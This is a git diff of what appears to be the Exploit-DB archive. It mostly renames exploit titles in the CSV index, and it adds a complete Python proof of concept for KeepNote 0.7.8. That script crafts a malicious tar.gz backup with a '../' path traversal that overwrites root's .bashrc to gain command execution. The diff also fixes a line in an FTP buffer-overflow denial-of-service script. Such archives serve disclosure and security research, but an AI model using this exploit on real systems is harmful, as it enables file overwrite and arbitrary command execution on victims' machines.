8899,platforms/windows/dos/8899.txt,"SAP GUI 6.4 - ActiveX (Accept) Remote Buffer Overflow (PoC)",2009-06-08,DSecRG,windows,dos,0 8900,platforms/php/webapps/8900.txt,"Frontis 3.9.01.24 - (source_class) SQL Injection",2009-06-08,snakespc,php,webapps,0 @@ -8554,7 +8554,7 @@ id,file,description,date,author,platform,type,port 9064,platforms/windows/local/9064.pl,"AudioPLUS 2.00.215 - '.lst' / '.m3u' Local Buffer Overflow (SEH)",2009-07-01,hack4love,windows,local,0 9065,platforms/windows/remote/9065.c,"Green Dam - Remote Change System Time Exploit",2009-07-01,"Anti GD",windows,remote,0 9066,platforms/hardware/remote/9066.txt,"ARD-9808 DVR Card Security Camera - Arbitrary Config Disclosure",2009-07-01,Septemb0x,hardware,remote,0 -9067,platforms/hardware/dos/9067.py,"ARD-9808 DVR Card Security Camera - (GET Request) Remote Denial of Service",2009-07-01,Stack,hardware,dos,0 +9067,platforms/hardware/dos/9067.py,"ARD-9808 DVR Card Security Camera - GET Request Remote Denial of Service",2009-07-01,Stack,hardware,dos,0 9068,platforms/php/webapps/9068.txt,"kervinet forum 1.1 - Multiple Vulnerabilities",2009-07-01,eLwaux,php,webapps,0 9069,platforms/php/webapps/9069.txt,"CMS chainuk 1.2 - Multiple Vulnerabilities",2009-07-01,eLwaux,php,webapps,0 9070,platforms/windows/local/9070.pl,"AudioPLUS 2.00.215 - '.pls' Local Buffer Overflow (SEH)",2009-07-01,Stack,windows,local,0 @@ -9085,7 +9085,7 @@ id,file,description,date,author,platform,type,port 9618,platforms/windows/local/9618.php,"Millenium MP3 Studio - (pls/mpf/m3u) Local Universal Buffer Overflows (SEH)",2009-09-09,hack4love,windows,local,0 9619,platforms/windows/local/9619.pl,"jetAudio 7.1.9.4030 plus - vx(asx/wax/wvx) Universal Local Buffer Overflow (SEH)",2009-09-09,hack4love,windows,local,0 9620,platforms/windows/dos/9620.pl,"Media Player Classic 6.4.9 - '.mid' Integer Overflow (PoC)",2009-09-09,PLATEN,windows,dos,0 -9621,platforms/windows/dos/9621.txt,"Kolibri+ WebServer 2 - (Get Request) Denial of Service",2009-09-10,"Usman Saeed",windows,dos,0 +9621,platforms/windows/dos/9621.txt,"Kolibri+ WebServer 2 - GET Request Denial of Service",2009-09-10,"Usman Saeed",windows,dos,0 9622,platforms/windows/dos/9622.py,"WarFTPd 1.82.00-RC12 - (LIST command) Format String Denial of Service",2009-09-10,corelanc0d3r,windows,dos,0 9623,platforms/php/webapps/9623.txt,"Advanced Comment System 1.0 - Multiple Remote File Inclusion",2009-09-10,Kurd-Team,php,webapps,0 9624,platforms/windows/local/9624.py,"KSP 2009R2 - '.m3u' Universal Local Buffer Overflow (SEH)",2009-09-10,hack4love,windows,local,0 @@ -9108,7 +9108,7 @@ id,file,description,date,author,platform,type,port 9641,platforms/linux/local/9641.txt,"Linux Kernel 2.4 / 2.6 - 'sock_sendpage()' Privilege Escalation (3)",2009-09-11,"Ramon Valle",linux,local,0 9642,platforms/multiple/dos/9642.py,"FreeRadius < 1.1.8 - Zero-Length Tunnel-Password Denial of Service",2009-09-11,"Matthew Gillespie",multiple,dos,1812 9643,platforms/windows/remote/9643.txt,"kolibri+ WebServer 2 - Directory Traversal",2009-09-11,"Usman Saeed",windows,remote,0 -9644,platforms/windows/remote/9644.py,"Kolibri+ WebServer 2 - (GET Request) Remote Overwrite (SEH)",2009-09-11,blake,windows,remote,80 +9644,platforms/windows/remote/9644.py,"Kolibri+ WebServer 2 - GET Request Remote Overwrite (SEH)",2009-09-11,blake,windows,remote,80 9645,platforms/aix/local/9645.sh,"IBM AIX 5.6/6.1 - _LIB_INIT_DBG Arbitrary File Overwrite via Libc Debug",2009-09-11,"Marco Ivaldi",aix,local,0 9646,platforms/hardware/dos/9646.php,"Siemens Gigaset SE361 WLAN - Remote Reboot Exploit",2009-09-11,crashbrz,hardware,dos,0 9647,platforms/php/webapps/9647.txt,"PHP-IPNMonitor - (maincat_id) SQL Injection",2009-09-11,noname,php,webapps,0 @@ -9121,7 +9121,7 @@ id,file,description,date,author,platform,type,port 9654,platforms/php/webapps/9654.php,"Joomla! Component AlphaUserPoints - SQL Injection",2009-09-14,jdc,php,webapps,0 9655,platforms/windows/local/9655.pl,"Invisible Browsing 5.0.52 - '.ibkey' Local Buffer Overflow",2009-09-14,PLATEN,windows,local,0 9656,platforms/php/webapps/9656.txt,"Aurora CMS 1.0.2 - (install.plugin.php) Remote File Inclusion",2009-09-14,"EA Ngel",php,webapps,0 -9657,platforms/windows/dos/9657.pl,"httpdx Web Server 1.4 - (Host Header) Remote Format String Denial of Service",2009-09-14,"Pankaj Kohli",windows,dos,0 +9657,platforms/windows/dos/9657.pl,"httpdx 1.4 - HTTP Server (Host Header) Remote Format String Denial of Service",2009-09-14,"Pankaj Kohli",windows,dos,0 9658,platforms/hardware/remote/9658.txt,"Neufbox NB4-R1.5.10-MAIN - Persistent Cross-Site Scripting",2009-09-14,"599eme Man",hardware,remote,0 9659,platforms/windows/local/9659.cpp,"Portable E.M Magic Morph 1.95b - '.MOR' File Stack Buffer Overflow (PoC)",2009-09-14,"fl0 fl0w",windows,local,0 9660,platforms/windows/remote/9660.pl,"Techlogica HTTP Server 1.03 - Arbitrary File Disclosure",2009-09-14,"ThE g0bL!N",windows,remote,0 @@ -9423,7 +9423,7 @@ id,file,description,date,author,platform,type,port 10050,platforms/php/webapps/10050.pl,"EZRecipeZee CMS 91 - File Inclusion",2009-10-12,kaMtiEz,php,webapps,0 10051,platforms/php/webapps/10051.txt,"QuickCart 3.x - Cross-Site Scripting / Cross-Site Request Forgery / Local File Inclusion / Directory Traversal",2009-10-08,kl3ryk,php,webapps,0 10052,platforms/php/webapps/10052.txt,"The BMW - inventory.php SQL Injection",2009-10-08,Dazz,php,webapps,0 -10053,platforms/windows/remote/10053.txt,"httpdx 1.4 - Get Request Buffer Overflow",2009-10-08,"Pankaj Kohli",windows,remote,80 +10053,platforms/windows/remote/10053.txt,"httpdx 1.4 - GET Request Buffer Overflow",2009-10-08,"Pankaj Kohli",windows,remote,80 10054,platforms/windows/remote/10054.txt,"SAP GUI VSFlexGrid.VSFlexGridL sp 14 - Buffer Overflow",2008-11-26,"Elazar Broad",windows,remote,0 10055,platforms/hardware/remote/10055.txt,"HP Multiple LaserJet Printer - Cross-Site Scripting",2009-07-04,sh2kerr,hardware,remote,80 10056,platforms/windows/remote/10056.py,"Ada Image Server 0.6.7 - imgsrv.exe Buffer Overflow",2009-10-07,blake,windows,remote,1235 @@ -12865,7 +12865,7 @@ id,file,description,date,author,platform,type,port 14678,platforms/php/dos/14678.txt,"PHP 5.3.3 - ibase_gen_id() Off-by-One Overflow",2010-08-18,"Canberk BOLAT",php,dos,0 14679,platforms/windows/dos/14679.pl,"VbsEdit 4.6.1.0 - Denial of Service",2010-08-18,"C.G. Tan",windows,dos,0 14681,platforms/windows/local/14681.py,"A-PDF WAV to MP3 1.0.0 - Universal Local SEH Exploit",2010-08-18,Dr_IDE,windows,local,0 -14683,platforms/windows/dos/14683.py,"Httpdx 1.5.4 - Multiple Denial of Service Vulnerabilities (http-ftp) (PoC)",2010-08-18,Dr_IDE,windows,dos,0 +14683,platforms/windows/dos/14683.py,"httpdx 1.5.4 - Multiple Denial of Service Vulnerabilities (http-ftp) (PoC)",2010-08-18,Dr_IDE,windows,dos,0 14684,platforms/php/webapps/14684.php,"Open-Realty 2.5.7 - Local File Disclosure",2010-08-18,"Nikola Petrov",php,webapps,0 14685,platforms/windows/dos/14685.pl,"RockN Wav Editor 1.8 - Denial of Service",2010-08-18,d4rk-h4ck3r,windows,dos,0 14686,platforms/php/webapps/14686.txt,"vbbuletin 4.0.4 - Multiple Vulnerabilities",2010-08-19,"mc2_s3lector ",php,webapps,0 @@ -14542,7 +14542,7 @@ id,file,description,date,author,platform,type,port 16729,platforms/windows/remote/16729.rb,"SlimFTPd - LIST Concatenation Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,0 16730,platforms/windows/remote/16730.rb,"3Com 3CDaemon 2.0 FTP - 'Username' Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16731,platforms/win_x86/remote/16731.rb,"Oracle 9i XDB (Windows x86) - FTP PASS Overflow (Metasploit)",2010-04-30,Metasploit,win_x86,remote,0 -16732,platforms/windows/remote/16732.rb,"HTTPDX - tolog() Function Format String (1)",2010-08-25,Metasploit,windows,remote,0 +16732,platforms/windows/remote/16732.rb,"httpdx - tolog() Function Format String (1)",2010-08-25,Metasploit,windows,remote,0 16733,platforms/windows/remote/16733.rb,"FileCopa FTP Server pre 18 Jul Version - Exploit (Metasploit)",2010-04-30,Metasploit,windows,remote,21 16734,platforms/windows/remote/16734.rb,"EasyFTP Server 1.7.0.11 - LIST Command Stack Buffer Overflow (Metasploit)",2010-08-03,Metasploit,windows,remote,0 16735,platforms/windows/remote/16735.rb,"NetTerm NetFTPD - USER Buffer Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,0 @@ -14604,12 +14604,12 @@ id,file,description,date,author,platform,type,port 16791,platforms/windows/remote/16791.rb,"MaxDB WebDBM - GET Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,9999 16792,platforms/windows/remote/16792.rb,"HP OpenView Network Node Manager - OvWebHelp.exe CGI Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0 16793,platforms/windows/remote/16793.rb,"Amlibweb NetOpacs - webquery.dll Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,80 -16794,platforms/windows/remote/16794.rb,"HTTPDX - tolog() Function Format String (2)",2010-08-25,Metasploit,windows,remote,80 +16794,platforms/windows/remote/16794.rb,"httpdx - tolog() Function Format String (2)",2010-08-25,Metasploit,windows,remote,80 16795,platforms/cgi/remote/16795.rb,"HP OpenView Network Node Manager - Toolbar.exe CGI Buffer Overflow (Metasploit)",2010-05-09,Metasploit,cgi,remote,0 16796,platforms/windows/remote/16796.rb,"BEA Weblogic - Transfer-Encoding Buffer Overflow (Metasploit)",2010-07-08,Metasploit,windows,remote,80 16797,platforms/windows/remote/16797.rb,"HP OpenView Network Node Manager - ovalarm.exe CGI Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0 16798,platforms/windows/remote/16798.rb,"Apache mod_jk 1.2.20 - Buffer Overflow (Metasploit)",2010-07-25,Metasploit,windows,remote,0 -16799,platforms/windows/remote/16799.rb,"HTTPDX - h_handlepeer() Function Buffer Overflow (Metasploit)",2010-07-26,Metasploit,windows,remote,0 +16799,platforms/windows/remote/16799.rb,"httpdx - h_handlepeer() Function Buffer Overflow (Metasploit)",2010-07-26,Metasploit,windows,remote,0 16800,platforms/windows/remote/16800.rb,"Streamcast 0.9.75 - HTTP User-Agent Buffer Overflow (Metasploit)",2010-06-11,Metasploit,windows,remote,8000 16801,platforms/windows/remote/16801.rb,"CA iTechnology iGateway - Debug Mode Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,5250 16802,platforms/windows/remote/16802.rb,"Webster HTTP Server - GET Buffer Overflow (Metasploit)",2010-11-03,Metasploit,windows,remote,0 @@ -15732,7 +15732,7 @@ id,file,description,date,author,platform,type,port 18101,platforms/hardware/webapps/18101.pl,"Comtrend Router CT-5624 - Remote Root/Support Password Disclosure/Change Exploit",2011-11-09,"Todor Donev",hardware,webapps,0 18102,platforms/windows/remote/18102.rb,"AbsoluteFTP 1.9.6 < 2.2.10 - Remote Buffer Overflow (LIST) (Metasploit)",2011-11-09,Node,windows,remote,0 18108,platforms/php/webapps/18108.rb,"Support Incident Tracker 3.65 - Remote Command Execution (Metasploit)",2011-11-13,Metasploit,php,webapps,0 -18105,platforms/linux/local/18105.sh,"glibc LD_AUDIT Arbitrary DSO - Load Privilege Escalation",2011-11-10,zx2c4,linux,local,0 +18105,platforms/linux/local/18105.sh,"glibc - LD_AUDIT Arbitrary DSO Load Privilege Escalation",2011-11-10,zx2c4,linux,local,0 18106,platforms/windows/dos/18106.pl,"Soda PDF Professional 1.2.155 - '.pdf' / '.WWF' File Handling Denial of Service",2011-11-11,LiquidWorm,windows,dos,0 18107,platforms/windows/dos/18107.py,"Kool Media Converter 2.6.0 - Denial of Service",2011-11-11,swami,windows,dos,0 18109,platforms/windows/local/18109.rb,"Aviosoft Digital TV Player Professional 1.0 - Stack Buffer Overflow (Metasploit)",2011-11-13,Metasploit,windows,local,0 @@ -16509,7 +16509,7 @@ id,file,description,date,author,platform,type,port 19098,platforms/multiple/dos/19098.txt,"Apple iTunes 10.6.1.7 - '.m3u' Playlist File Walking Heap Buffer Overflow",2012-06-13,LiquidWorm,multiple,dos,0 19099,platforms/hardware/remote/19099.rb,"F5 BIG-IP - SSH Private Key Exposure (Metasploit)",2012-06-13,Metasploit,hardware,remote,0 19100,platforms/php/webapps/19100.rb,"WordPress Plugin Foxypress - Uploadify.php Arbitrary Code Execution (Metasploit)",2012-06-13,Metasploit,php,webapps,0 -19101,platforms/unix/remote/19101.c,"Xi Graphics Maximum CDE 1.2.3 & TriTeal TED CDE 4.3 & Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (1)",1998-08-31,"NAI research team",unix,remote,0 +19101,platforms/unix/remote/19101.c,"Xi Graphics Maximum CDE 1.2.3 / TriTeal TED CDE 4.3 / Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (1)",1998-08-31,"NAI research team",unix,remote,0 19102,platforms/unix/remote/19102.c,"Xi Graphics Maximum CDE 1.2.3 / TriTeal TED CDE 4.3 / Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (2)",1998-08-31,"NAI research team",unix,remote,0 19103,platforms/linux/remote/19103.c,"HP HP-UX 10.34 / ms Windows 95/NT 3.5.1 SP1/NT 3.5.1 SP2/NT 3.5.1 SP3/NT 3.5.1 SP4/NT 4.0/NT 4.0 SP1/NT 4.0 SP2/NT 4.0 SP3 - Denial of Service",1997-11-13,"G P R",linux,remote,0 40434,platforms/php/remote/40434.rb,"FreePBX < 13.0.188 - Remote Command Execution (Metasploit)",2016-09-27,0x4148,php,remote,0 @@ -17346,7 +17346,7 @@ id,file,description,date,author,platform,type,port 19985,platforms/php/webapps/19985.txt,"NetArt Media iBoutique 4.0 - (index.php key Parameter) SQL Injection",2012-07-20,"SecPod Research",php,webapps,0 19986,platforms/windows/dos/19986.txt,"Oxide WebServer 2.0.4 - Denial of Service",2012-07-20,"SecPod Research",windows,dos,0 19987,platforms/linux/dos/19987.py,"ptunnel 0.72 - Remote Denial of Service",2012-07-20,st3n,linux,dos,0 -19988,platforms/windows/dos/19988.pl,"httpdx 1.5.4 - Remote HTTP Server Denial of Service",2012-07-20,st3n,windows,dos,0 +19988,platforms/windows/dos/19988.pl,"httpdx 1.5.4 - HTTP Server Remote Denial of Service",2012-07-20,st3n,windows,dos,0 19989,platforms/windows/local/19989.c,"PassWD 1.2 - Weak Encryption",2000-06-04,"Daniel Roethlisberger",windows,local,0 19990,platforms/hp-ux/local/19990.txt,"HP-UX 10.20/11.0 man - /tmp Symlink Exploit",2000-06-02,"Jason Axley",hp-ux,local,0 19991,platforms/linux/local/19991.c,"BSD mailx 8.1.1-10 - Buffer Overflow (1)",2000-06-02,"Paulo Ribeiro",linux,local,0 @@ -18899,7 +18899,8 @@ id,file,description,date,author,platform,type,port 21597,platforms/windows/remote/21597.txt,"Key Focus KF Web Server 1.0.2 - Directory Contents Disclosure",2002-07-08,Securiteinfo.com,windows,remote,0 21598,platforms/linux/dos/21598.c,"Linux Kernel 2.4.18/19 - Privileged File Descriptor Resource Exhaustion",2002-07-08,"Paul Starzetz",linux,dos,0 21599,platforms/windows/remote/21599.txt,"Working Resources BadBlue 1.7.3 - cleanSearchString() Cross-Site Scripting",2002-07-08,"Matthew Murphy",windows,remote,0 -21600,platforms/windows/dos/21600.txt,"Working Resources BadBlue 1.7.3 - Get Request Denial of Service",2002-07-08,"Matthew Murphy",windows,dos,0 +21600,platforms/windows/dos/21600.txt,"Working Resources BadBlue 1.7.3 - GET Request Denial of Service",2002-07-08,"Matthew Murphy",windows,dos,0 +40440,platforms/multiple/local/40440.py,"KeepNote 0.7.8 - Command Execution",2016-09-29,R-73eN,multiple,local,0 21601,platforms/windows/remote/21601.c,"Microsoft Foundation Class Library 7.0 - ISAPI Buffer Overflow",2002-07-08,"Matthew Murphy",windows,remote,0 21602,platforms/linux/remote/21602.txt,"icecast server 1.3.12 - Directory Traversal Information Disclosure",2002-07-09,glaive,linux,remote,0 21603,platforms/multiple/remote/21603.txt,"iPlanet Web Server 4.1 - Search Component File Disclosure",2002-07-09,"Qualys Corporation",multiple,remote,0 @@ -19229,7 +19230,7 @@ id,file,description,date,author,platform,type,port 21932,platforms/windows/remote/21932.pl,"Microsoft Outlook Express 5.5/6.0 - S/MIME Buffer Overflow",2002-10-10,"Noam Rathaus",windows,remote,0 21933,platforms/php/webapps/21933.txt,"PHPRank 1.8 - add.php Cross-Site Scripting",2002-10-10,"Jedi/Sector One",php,webapps,0 21934,platforms/linux/remote/21934.txt,"KDE 3.0.x - KPF Icon Option File Disclosure",2002-10-11,"Ajay R Ramjatan",linux,remote,0 -21935,platforms/windows/dos/21935.txt,"My Web Server 1.0.1/1.0.2 - Long Get Request Denial of Service",2002-10-12,"Marc Ruef",windows,dos,0 +21935,platforms/windows/dos/21935.txt,"My Web Server 1.0.1/1.0.2 - Long GET Request Denial of Service",2002-10-12,"Marc Ruef",windows,dos,0 21936,platforms/linux/remote/21936.c,"ATP httpd 0.4 - Single Byte Buffer Overflow",2002-10-05,thread,linux,remote,0 21937,platforms/linux/remote/21937.c,"ghttpd 1.4.x - Log() Function Buffer Overflow",2002-10-07,flea,linux,remote,0 21938,platforms/windows/dos/21938.txt,"TelCondex SimpleWebserver 2.0.6 - Denial of Service",2002-10-15,"Marc Ruef",windows,dos,0 @@ -19888,7 +19889,7 @@ id,file,description,date,author,platform,type,port 22607,platforms/php/webapps/22607.txt,"EZ Publish 2.2 - 'index.php' IMG Tag Cross-Site Scripting",2003-05-16,"Ferruh Mavituna",php,webapps,0 22608,platforms/windows/dos/22608.txt,"Snowblind Web Server 1.0/1.1 - Malformed HTTP Request Denial of Service",2003-05-16,euronymous,windows,dos,0 22609,platforms/windows/remote/22609.txt,"Snowblind 1.0/1.1 - Web Server File Disclosure",2003-05-16,euronymous,windows,remote,0 -22610,platforms/windows/dos/22610.txt,"Snowblind Web Server 1.0/1.1 - (GET Request) Buffer Overflow",2003-05-16,euronymous,windows,dos,0 +22610,platforms/windows/dos/22610.txt,"Snowblind Web Server 1.0/1.1 - GET Request Buffer Overflow",2003-05-16,euronymous,windows,dos,0 22611,platforms/multiple/remote/22611.txt,"Netscape Enterprise Server 3.x/4.x - PageServices Information Disclosure",1998-08-16,anonymous,multiple,remote,0 22612,platforms/php/webapps/22612.txt,"ttCMS 2.2/2.3 - header.php Remote File Inclusion",2003-05-17,ScriptSlave@gmx.net,php,webapps,0 22613,platforms/freebsd/local/22613.pl,"Maelstrom Server 3.0.x - Argument Buffer Overflow (1)",2003-05-20,"Luca Ercoli",freebsd,local,0 @@ -20070,7 +20071,7 @@ id,file,description,date,author,platform,type,port 22791,platforms/php/webapps/22791.txt,"SquirrelMail 1.2.11 - move_messages.php Arbitrary File Moving",2003-06-17,dr_insane,php,webapps,0 22792,platforms/php/webapps/22792.txt,"SquirrelMail 1.2.11 - Administrator Plugin options.php Arbitrary Admin Account Creation",2003-06-17,dr_insane,php,webapps,0 22793,platforms/php/webapps/22793.txt,"SquirrelMail 1.2.11 - Exploit",2003-06-17,dr_insane,php,webapps,0 -22794,platforms/windows/dos/22794.txt,"Proxomitron Proxy Server - Long Get Request Remote Denial of Service",2003-06-17,dr_insane,windows,dos,0 +22794,platforms/windows/dos/22794.txt,"Proxomitron Proxy Server - Long GET Request Remote Denial of Service",2003-06-17,dr_insane,windows,dos,0 22795,platforms/windows/remote/22795.txt,"MiniHTTPServer WebForums Server 1.x/2.0 - Directory Traversal",2003-06-18,dr_insane,windows,remote,0 22796,platforms/linux/dos/22796.php,"MidHosting FTP Daemon 1.0.1 - Shared Memory Local Denial of Service",2003-06-18,"Frank DENIS",linux,dos,0 22797,platforms/hardware/dos/22797.txt,"Avaya Cajun P130/P133/P330/P333 Network Switch - Connection Stalling Denial of Service",2003-06-18,"Jacek Lipkowski",hardware,dos,0 diff --git a/platforms/multiple/local/40440.py b/platforms/multiple/local/40440.py new file mode 100755 index 000000000..d584a69fb --- /dev/null +++ b/platforms/multiple/local/40440.py @@ -0,0 +1,45 @@ +# Title : KeepNote 0.7.8 Remote Command Execution +# Date : 29/09/2016 +# Author : R-73eN +# Twitter : https://twitter.com/r_73en +# Tested on : KeepNote 0.7.8 (Kali Linux , and Windows 7) +# Software : http://keepnote.org/index.shtml#download +# Vendor : ~ +# +# DESCRIPTION: +# +# When the KeepNote imports a backup which is actuallt a tar.gz file doesn't checks for " ../ " characters +# which makes it possible to do a path traversal and write anywhere in the system(where the user has writing permissions). +# This simple POC will write to the /home/root/.bashrc the file test.txt to get command execution when the bash is run. +# There are a lot of ways but i choose this just for demostration purposes and its supposed we run the keepnote application +# as root (default in kali linux which this bug is tested). +# +# + + +banner = "" +banner +=" ___ __ ____ _ _ \n" +banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n" +banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n" +banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n" +banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n" +print banner + +import tarfile, sys + +if(len(sys.argv) != 2): + print "[+] Usage : python exploit.py file_to_do_the_traversal [+]" + print "[+] Example: python exploit.py test.txt" + exit(0) +print "[+] Creating Exploit File [+]" + +filename = "KeepNoteBackup.tar.gz" + +path = "../../../../../../../home/root/.bashrc" + +tf = tarfile.open(filename,"w:gz") +tf.add(sys.argv[1], path) +tf.close() + +print "[+] Created KeepNoteBackup.tar.gz successfully [+]" + diff --git a/platforms/windows/dos/11343.py b/platforms/windows/dos/11343.py index 42ebf140a..7bd833bed 100755 --- a/platforms/windows/dos/11343.py +++ b/platforms/windows/dos/11343.py @@ -18,4 +18,4 @@ connect=s.connect(('xxx.xxx.xxx.xxx',21)) #Remember to put in the server's addre s.recv(1024) s.send('USER '+ buffer +'\r\n') #yup, doesn't take much does it. s.recv(1024) # -s.close #don't really need these, force of habit \ No newline at end of file +s.close() #don't really need these, force of habit \ No newline at end of file